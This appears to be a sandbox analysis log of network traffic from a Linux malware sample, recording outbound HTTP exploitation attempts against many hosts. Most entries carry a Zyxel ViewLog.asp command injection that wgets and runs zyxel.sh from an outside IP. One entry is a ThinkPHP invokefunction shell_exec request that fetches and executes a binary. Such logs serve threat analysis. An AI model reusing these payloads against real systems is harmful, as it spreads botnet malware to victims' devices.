                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 34 63 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 38 26 23 34 36 3b 66 37 31 62 39 38 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;764cdb17&#46;1707899698&#46;f71b98cc</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.144836888.212.60.23080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.555380106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:58.781476974 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.145425231.136.205.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.941560984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.588376999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.836275101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.524317980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:08.644020081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.627574921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:38.594837904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.145874894.112.8.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.941611052 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.620405912 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.144524262.29.46.688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.965271950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.144560294.121.99.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:58.966778994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.143705094.46.25.228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.149585009 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.355655909 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:59 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.143556231.136.104.748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.164843082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.844415903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220350027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:04.036178112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.667931080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.675458908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.690617085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.143735895.228.201.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.180464983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.145905494.120.251.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.212822914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.143750294.121.28.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.212946892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.144474694.122.0.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.213062048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
